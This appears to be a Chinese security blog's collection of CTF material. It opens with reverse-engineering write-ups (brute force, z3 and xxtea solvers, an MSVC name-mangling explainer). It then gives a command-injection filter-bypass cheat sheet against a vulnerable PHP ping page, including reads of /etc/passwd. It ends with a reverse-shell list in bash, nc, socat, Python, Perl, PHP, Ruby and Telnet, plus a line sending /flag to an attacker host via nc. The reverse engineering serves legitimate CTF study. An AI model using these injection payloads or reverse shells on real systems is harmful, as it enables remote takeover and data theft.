0xcafebabe 发布的文章

[ACTF新生赛2020] Oruga

抄出来爆破

#include <iostream>

unsigned char byte_201020[256] = {
    0x00, 0x00, 0x00, 0x00, 0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x23, 0x23, 0x23, 0x23,
    0x00, 0x00, 0x00, 0x23, 0x23, 0x00, 0x00, 0x00, 0x4F, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4F, 0x4F, 0x00, 0x50, 0x50, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x4C, 0x00, 0x4F, 0x4F, 0x00, 0x4F, 0x4F, 0x00, 0x50, 0x50, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x4C, 0x00, 0x4F, 0x4F, 0x00, 0x4F, 0x4F, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x4C, 0x4C, 0x00, 0x4F, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x4F, 0x4F, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, 0x00, 0x00,
    0x23, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x23, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x4D, 0x4D, 0x00, 0x00, 0x00, 0x23, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4D, 0x4D, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x45, 0x45,
    0x00, 0x00, 0x00, 0x30, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x45, 0x45,
    0x54, 0x54, 0x54, 0x49, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00,
    0x00, 0x54, 0x00, 0x49, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x00, 0x00, 0x00, 0x45, 0x00,
    0x00, 0x54, 0x00, 0x49, 0x00, 0x4D, 0x00, 0x4D, 0x00, 0x4D, 0x21, 0x00, 0x00, 0x00, 0x45, 0x45
};

int __fastcall sub_78A(const char* src)
{
    int v2; // [rsp+Ch] [rbp-Ch]
    int v3; // [rsp+10h] [rbp-8h]
    int v4; // [rsp+14h] [rbp-4h]

    v2 = 0;
    v3 = 5;
    v4 = 0;
    while (byte_201020[v2] != 0x21)
    {
        v2 -= v4;
        if (src[v3] != 'W' || v4 == -16)
        {
            if (src[v3] != 'E' || v4 == 1)
            {
                if (src[v3] != 'M' || v4 == 0x10)
                {
                    if (src[v3] != 'J' || v4 == -1)
                        return v3 + 1;
                    v4 = -1;
                }
                else
                {
                    v4 = 16;
                }
            }
            else
            {
                v4 = 1;
            }
        }
        else
        {
            v4 = -16;
        }
        ++v3;
        while (!byte_201020[v2])
        {
            if (v4 == -1 && (v2 & 0xF) == 0)
                return v3;
            if (v4 == 1 && v2 % 16 == 15)
                return v3;
            if (v4 == 16 && (unsigned int)(v2 - 240) <= 0xF)
                return v3;
            if (v4 == -16 && (unsigned int)(v2 + 15) <= 0x1E)
                return v3;
            v2 += v4;
        }
    }
    return v3 + 1;
}

int main()
{
    int i;
    char* src = (char*)malloc(40);
    if (!src) return -1;
    memcpy_s(src, 40, "actf{", 5);
    int last = 5;
    for (i = 0; i < 40; i++)
    {
        src[6 + i] = 0;
        src[5 + i] = 'W';
        if (sub_78A(src) == i + 6)
        {
            src[5 + i] = 'J';
            if (sub_78A(src) == i + 6)
            {
                src[5 + i] = 'M';
                if (sub_78A(src) == i + 6)
                {
                    src[5 + i] = 'E';
                    if (sub_78A(src) == i + 6)
                    {
                        src[5 + i] = '}';
                        if (sub_78A(src) == i + 6)
                        {
                            break;
                        }
                    }
                }
            }
        }
    }

    printf("%s", src);
    free(src);
}

actf{MEWEMEWJMEWJM}

[WUSTCTF2020] level4

2024-08-01T10:33:50.png
题目给了中序和后序排列

Practice my Data Structure code.....
Typing....Struct.....char....*left....*right............emmmmm...OK!
Traversal!
Traversal type 1:2f0t02T{hcsiI_SwA__r7Ee}
Traversal type 2:20f0Th{2tsIS_icArE}e7__w
Traversal type 3:    //type3(&x[22]);   No way!

显然缺了个前序排列,应该就是结果
我们用Python解

def ToPreOrder(Postorder,Inorder):
    length = len(Postorder)
    if length == 0:
        return 0
    root = Postorder[length-1]
    for i in range(length):
        if root == Inorder[i]:
            break
    print(root,end="")
    ToPreOrder(Postorder[0:i],Inorder[0:i])
    ToPreOrder(Postorder[i:length-1],Inorder[i+1:length])
    
ToPreOrder("20f0Th{2tsIS_icArE}e7__w","2f0t02T{hcsiI_SwA__r7Ee}")
# wctf2020{This_IS_A_7reE}

[GUET-CTF2019] number_game

树中序和后序排列,动调一下可以拿到替换表。
2024-08-02T02:39:34.png
然后再分析一下,可以得知,相邻行/列不能相同,且输入只能是0 1 2 3 4这五个字符。
2024-08-02T02:39:47.png
写出z3-solver脚本即可。

from z3 import *
x = [BitVec(f"x{i}", 8) for i in range(25)]
s = Solver()

raw = """
1 4 # 2 3
3 0 # 1 #
0 # 2 3 #
# 3 # # 0
4 2 # # 1
"""

raw = "".join(raw.replace(' ', '').splitlines())
for i, v in enumerate(raw):
    if v != '#':
        s.add(x[i] == ord(v))
    else:
        s.add(x[i] >= ord('0'), x[i] <= ord('4'))

for i in range(5):
    for j in range(5):
        for k in range(j + 1, 5):
            s.add(x[5 * i + j] != x[5 * i + k])
            s.add(x[5 * j + i] != x[5 * k + i])


print(s)
print(s.check())
m = s.model()
ans = ""

for i in x:
    ans += chr(m[i].as_long())

for i in range(5):
    for j in range(5):
        print(ans[5*i+j], end=' ')
    print("")


# Tree transform
d_before = "0123456789"
d_after = "7381940526"
d_table = [d_before.index(d_after[i]) for i in range(len(d_before))]
print("table", d_table)

answers = [2, 7, 9, 11, 14, 15, 17, 18, 22, 23]
flag_ans = [i for i in range(10)]
for i in range(len(answers)):
    flag_ans[d_table[i]] = ans[answers[i]]

flag = "".join(flag_ans)
print(flag)
sat
1 4 0 2 3 
3 0 4 1 2
0 1 2 3 4
2 3 1 4 0
4 2 3 0 1
table [7, 3, 8, 1, 9, 4, 0, 5, 2, 6]
1134240024

flag{1134240024}

[2019红帽杯]xx

xxtea, S-box, 每3位为一组,每一组迭代异或。
xxtea用regadgets解,key是输入的前四个字符,我们认为输入前四个字符就是flag。
S盒用输入输出造一个,迭代异或用z3解。

from regadgets import *
from copy import deepcopy
from z3 import *
k = byte2dword(b'flag' + b'\x00' * 12)
print('key', k)

# Use My input and the data after s-box trans to make S-BOX.
enc1_s = bytes.fromhex('B5 B4 16 CB 6B CA 9C DB B9 DE C7 8E 56 94 77 66 EE AB 00 D6 0C 42 3C 70')
enc1_r = bytes.fromhex('B4 CB B5 16 CA DB 6B 9C DE 8E B9 C7 94 66 56 77 AB D6 EE 00 42 70 0C 3C')

enc = [0x6B40BCCE, 0xC0953A7C, 0x20209BEF, 0x3502F791, 0xC8021823, 0xFA5656E7]
enc = dword2byte(enc)

inv_s_box = [enc1_s.index(i) for i in enc1_r]
# s_box = [enc1_r.index(i) for i in enc1_s]

# Use Z3-Solver to solve.
s = Solver()
x = [BitVec(f"x{i}", 8) for i in range(24)]
y = deepcopy(x)
for i in range(3, 24):
    for j in range(i // 3):
        x[i] ^= x[j]

for i in range(len(enc)):
    s.add(enc[i] == x[i])
if s.check() != sat:
    print("no solve")
    exit(0)
m = s.model()
result = []
for i in y:
    result.append(m[i].as_long())

result = [result[inv_s_box[i]] for i in range(len(result))]
result = xxtea_decrypt(byte2dword(result), k, debug=True)
print(dword2byte(result))
# b'flag{CXX_and_++tea}\x00\x13\x00\x00\x00'

[2019红帽杯]childRE

非常有意思的一道题,首先是对于输入的flag进行一个树的后序遍历,然后是UnDecorateSymbolName(SymbolName指的是C++的编译后函数名称修饰),然后就是一个查表就解决了。
exp

from regadgets import *
from hashlib import md5
str1 = [0x28, 0x5F, 0x40, 0x34, 0x36, 0x32, 0x30, 0x21, 0x30, 0x38, 0x21, 0x36, 0x5F, 0x30, 0x2A, 0x30, 0x34, 0x34, 0x32, 0x21, 0x40, 0x31, 0x38, 0x36, 0x25, 0x25, 0x30, 0x40, 0x33, 0x3D,
        0x36, 0x36, 0x21, 0x21, 0x39, 0x37, 0x34, 0x2A, 0x33, 0x32, 0x33, 0x34, 0x3D, 0x26, 0x30, 0x5E, 0x33, 0x26, 0x31, 0x40, 0x3D, 0x26, 0x30, 0x39, 0x30, 0x38, 0x21, 0x36, 0x5F, 0x30, 0x2A, 0x26]
str2 = [0x35, 0x35, 0x35, 0x36, 0x35, 0x36, 0x35, 0x33, 0x32, 0x35, 0x35, 0x35, 0x35, 0x32, 0x32, 0x32, 0x35, 0x35, 0x36, 0x35, 0x35, 0x36, 0x35, 0x35, 0x35, 0x35, 0x32, 0x34, 0x33, 0x34,
        0x36, 0x36, 0x33, 0x33, 0x34, 0x36, 0x35, 0x33, 0x36, 0x36, 0x33, 0x35, 0x34, 0x34, 0x34, 0x32, 0x36, 0x35, 0x36, 0x35, 0x35, 0x35, 0x35, 0x35, 0x32, 0x35, 0x35, 0x35, 0x35, 0x32, 0x32, 0x32]
xxx = [0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F,
       0x50, 0x7B, 0x7D, 0x61, 0x73, 0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x41, 0x53, 0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x5A, 0x58, 0x43, 0x56, 0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x7A, 0x78, 0x63, 0x76, 0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F]
r = []
for i in range(62):
    a = xxx.index(str1[i])
    b = xxx.index(str2[i])
    r.append(b * 23 + a)
# private: char * __thiscall R0Pxx::My_Aut0_PWN(unsigned char *)
print(bytes(r))

# 手动转换一下 查表
r = b'?My_Aut0_PWN@R0Pxx@@AAEPADPAE@Z'

data_from = b'abcdefghijklmnopqrstuvwxyz12345'
data_to = b'pqhrsidtujvwkebxylz1mf23n45ogca'
_, ibox = generate_sbox(data_from, data_to)
r = sbox_transform(r, ibox)

print(bytes(r))
print(f"flag{{{md5(bytes(r)).hexdigest()}}}")
# flag{63b148e750fed3a33419168ac58083f5}

学习了一下gcc和vs的名称粉碎(装饰)

修饰规则

C++ 的修饰规则为 “? + 函数名 + 标识符”

标识符的第一部分

标识符的第一部分是调用规则说明:

类型符号
intH
charD
voidX
unsigned intI
unsigned charE
floatM
doubleN
bool_N
structU

标识符的第二部分

标识符的第二部分依次是返回值和函数参数的类型:

其中,如果类型是指针,则在标识符前增加 PA;如果是 const 类型的指针,则增加 PB。对于结构体,则在 U 后面添加结构体的名称,并以 @@ 结尾。

标识符的第三部分

标识符的第三部分是结束符:

  • 如果函数有参数,则以 “@Z” 结束,否则以 “Z” 结束。

函数名的第一部分

函数名的第一部分是函数的本名。如果该函数不是类的成员,那么就只有第一部分。

函数名的第二部分

对于类的成员的不同属性有如下规则:

属性无 const有 const
public@@QAE@@QBE
protected@@IAE@@IBE
private@@AAE@@ABE

同时取消标识符的第一部分。此时如果参数为类实例引用,则改为 “AAV1”,带 const 改为 “ABV1”。

例子

对于以下函数:

int Function1(char*, unsigned char);
struct mytype {
    int x, y;
};

class CTest { 
private: 
    void Function1(int); 
protected: 
    void Function2(const CTest &src); 
public: 
    void Function3(mytype*, int);
};

其中:

Function1 的修饰应当为:?Function1@CTest@@AAEXH@Z
Function2 的修饰应当为:?Function2@CTest@@IAEXABV1@Z
Function3 的修饰应当为:?Function3@CTest@@QAEXPAUmytype@@H@Z

[NPUCTF2020]你好sao啊

from regadgets import *

table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz01234{}789+/="
enc = bytes(qword2byte([0xFD370FEB59C9B9E, 0xDEAB7F029C4FD1B2, 0xFACD9D40E7636559]))

print(enc)
enc_bin = bin(b2l(enc))[2:]
print(enc_bin)
for i in range(0, len(enc_bin), 6):
    v = enc_bin[i:i+6]
    print(table[int(v, 2)], end='')

# b'\x9e\x9b\x9c\xb5\xfep\xd3\x0f\xb2\xd1O\x9c\x02\x7f\xab\xdeYec\xe7@\x9d\xcd\xfa'
# 100111101001101110011100101101011111111001110000110100110000111110110010110100010100111110011100000000100111111110101011110111100101100101100101011000111110011101000000100111011100110111111010
# npuctf{w0w+y0U+cAn+r3lllY+dAnc3}

[RoarCTF2019]polyre

d810 反混淆,然后CRC64,用z3解。

from regadgets import *
from z3 import *
from copy import deepcopy
enc = b"\x96\x62\x53\x43\x6D\xF2\x8F\xBC\x16\xEE\x30\x05\x78\x00\x01\x52\xEC\x08\x5F\x93\xEA\xB5\xC0\x4D\x50\xF4\x53\xD8\xAF\x90\x2B\x34\x81\x36\x2C\xAA\xBC\x0E\x25\x8B\xE4\x8A\xC6\xA2\x81\x9F\x75\x55\xB3"
def decrypt(x):
    s = Solver()
    y = BitVec("x", 64)
    z = deepcopy(y)
    for i in range(64):
        y = If(LShR(y, 63) == 1, (y*2) ^ 0xB0004B7679FA26B3, y * 2)
    s.add(y == x)
    print(s.check())
    m = s.model()
    return qword2byte(m[z].as_long())


r = b''
for i in range(0, len(enc), 8):
    r += decrypt(byte2qword(enc[i:i+8])[0])
print(r)

写在开头

你首先需要了解题目对于字符串的过滤与禁用情况,所以建议搭配Fuzz进行使用。

命令分割

如果给你这样的php

<?php
    $ip = $_GET['ip'];
    system("ping -c 4 " . $ip);
?>

显然ip可控,所以你需要构造一个payload使得你的命令被正确执行。

各种分割策略如下

  • ; (Semicolon): Allows you to execute multiple commands sequentially.
  • && (AND): Execute the second command only if the first command succeeds (returns a zero exit status).
  • || (OR): Execute the second command only if the first command fails (returns a non-zero exit status).
  • & (Background): Execute the command in the background, allowing the user to continue using the shell.
  • | (Pipe): Takes the output of the first command and uses it as the input for the second command.
command1; command2   # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2  # Execute command1 in the background
command1 | command2  # Pipe the output of command1 into command2

空格绕过

1.$IFS$9 ${IFS} $IFS
cat$IFS$9/flag
2.<字符的使用
Input redirection. The < character tells the shell to read the contents of the file specified.
cat</flag cat</etc/passwd
3.ANSI-C Quoting

X=$'uname\x20-a'&&$X

4.Tab绕过
The tab character can sometimes be used as an alternative to spaces. In ASCII, the tab character is represented by the hexadecimal value 09.
;ls%09-al%09/home
5.换行绕过
Commands can also be run in sequence with newlines

original_cmd_by_server
ls

字符匹配绕过

1.如下面几种引号成双出现的时候可以分开字符,特别注意{}中间要加一个,而且加一个{,}后,命令就会多执行一次
c``a""t f{,}l``a''g
2.通过echo -e来转义
echo -e '\x31' 将会输出1 echo -e '\x2f\x66\x6c\x61\x67' 则会输出/flag
还有下面一些

swissky@crashlab:~$ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd

swissky@crashlab:~$ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd

swissky@crashlab:~$ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd

swissky@crashlab:~$ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash

3.反斜杠换行绕过

  • Commands can be broken into parts by using backslash followed by a newline

    $ cat /et\
    c/pa\
    sswd
  • URL encoded form would look like this:

    cat%20/et%5C%0Ac/pa%5C%0Asswd

4.通过命令绕过(在斜杠被屏蔽时)
Commands execution without backslash and slash - linux bash

swissky@crashlab:~$ echo ${HOME:0:1}
/

swissky@crashlab:~$ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash

swissky@crashlab:~$ echo . | tr '!-0' '"-1'
/

swissky@crashlab:~$ tr '!-0' '"-1' <<< .
/

swissky@crashlab:~$ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash

比如这个${HOME:0:1}还有其他玩法,这个相当于是取了env中的HOME来进行截断,你可以先取env然后观察里面是否有你想要的字符,然后再进行截断即可进行绕过
5.通过斜杠与反斜杠来绕过

w\ho\am\i
/\b\i\n/////s\h

6.通过$@来绕过
$0: Refers to the name of the script if it's being run as a script. If you're in an interactive shell session, $0 will typically give the name of the shell.

who$@ami
echo whoami|$0

7.通过$()来绕过

who$()ami
who$(echo am)i
who`echo am`i

8.可变扩展绕过

sh-5.2# echo /???
/bin /dev /etc /lib /mnt /opt /run /srv /sys /tmp /usr /var
sh-5.2# echo /???/??
/bin/ar /bin/as /bin/cp /bin/dd /bin/df /bin/du /bin/id /bin/ip /bin/ld /bin/ln /bin/ls /bin/mv /bin/nc /bin/nl /bin/nm /bin/od /bin/pg /bin/pr /bin/ps /bin/rm /bin/sg /bin/sh /bin/ss /bin/su /bin/tc /bin/tr /bin/ul /bin/wc /bin/xz /dev/fd /lib/tc /sys/fs /var/db
sh-5.2# echo /???/???
/bin/arp /bin/awk /bin/cal /bin/cat /bin/cmp /bin/col /bin/ctr /bin/cut /bin/dcb /bin/dir /bin/dwp /bin/env /bin/fmt /bin/gdb /bin/gio /bin/git /bin/gpg /bin/gpm /bin/jar /bin/jdb /bin/jps /bin/ksu /bin/ldd /bin/lz4 /bin/mev /bin/mvn /bin/php /bin/pip /bin/psl /bin/ptx /bin/pwd /bin/rev /bin/scp /bin/sed /bin/seq /bin/sln /bin/ssh /bin/sum /bin/tac /bin/tar /bin/tee /bin/tic /bin/toe /bin/top /bin/tty /bin/vim /bin/who /bin/xjc /bin/xxd /bin/yes /bin/zic /bin/zip /bin/zsh /dev/bus /dev/cpu /dev/dri /dev/fb0 /dev/log /dev/mem /dev/net /dev/ppp /dev/pts /dev/rtc /dev/shm /dev/snd /dev/tty /dev/vcs /dev/vda /dev/vdb /etc/X11 /etc/cni /etc/gdb /etc/iwd /etc/php /etc/rpc /etc/ssh /etc/ssl /etc/xdg /etc/zsh /lib/awk /lib/gio /lib/icu /lib/iwd /lib/jvm /lib/lua /lib/php /lib/ssh /lib/tar /lib/zsh /run/log /srv/ftp /sys/bus /sys/dev /usr/bin /usr/lib /usr/src /var/lib /var/log /var/opt /var/run /var/tmp
sh-5.2# echo /???/??t
/bin/cat /bin/cut /bin/fmt /bin/git /dev/net /var/opt

显然/???/??t可以拿到我们的cat,直接执行,会把/bin/cut....到/var/opt这些东西都当作cat的参数进行输入
所以我们附加在后面使用/???/p??s??来获取到/bin/passwd /etc/passwd /etc/pkcs11 /lib/pkcs11
/???/??t /???/p??s??就可以拿到我们想要的/etc/passwd了,当然如果过滤没有那么严,可以把?换成几个正确的来减少匹配到的东西的个数。
echo /???/../f***当然这样可以匹配到根目录下的flag
当然不光可以使用上面方法直接cat,我们也可以定义变量

test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}

9.wildchar绕过

powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc

时间忙注(大嘘)

swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab:~$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

如果匹配对了,那么就sleep 5s这样就很显然

内联执行

通过 `` 可以实现,如 cat `ls` 则先会执行ls,把ls的结果作为输入的字符串再cat,这样的操作结果是输出当前目录下ls出来的所有文件。
这样也可以配合字符串匹配绕过使用,如 `echo Y2F0IC9mbGFn | base64 -d` 这个payload将会执行cat /flag

写在最后

这个文章有点标题党了,因为我一下搞不了那么多,所以以后想到啥再来补啥吧,挖个坑,打算搞一个类似于fenjing那种非常好用的一键式工具,自动绕过所有的检测。

在服务端启动

nc -nvlp YOUR_PORT

在客户端执行

bash

bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1

sh

0<&196;exec 196<>/dev/tcp/YOUR_IP/YOUR_PORT; sh <&196 >&196 2>&196

socat

socat tcp-connect:YOUR_IP:YOUR_PORT exec:sh,pty,stderr,setsid,sigint,sane

nc

normal
nc -e /bin/sh YOUR_IP YOUR_PORT
without -e
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc YOUR_IP YOUR_PORT > /tmp/f

Ruby

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("YOUR_IP","YOUR_PORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",YOUR_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("YOUR_IP",YOUR_PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

Telnet

TF=$(mktemp -u); mkfifo $TF && telnet YOUR_IP YOUR_PORT 0<$TF | /bin/sh 1>$TF

ksh

ksh -c 'ksh -i > /dev/tcp/YOUR_IP/YOUR_PORT 2>&1 0>&1'

Perl

perl -e 'use Socket;$i="YOUR_IP";$p=YOUR_PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Perl Windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"YOUR_IP:YOUR_PORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

当你只需要将命令执行结果发回去的时候:

cat /flag | nc YOUR_IP YOUR_PORT这样就行了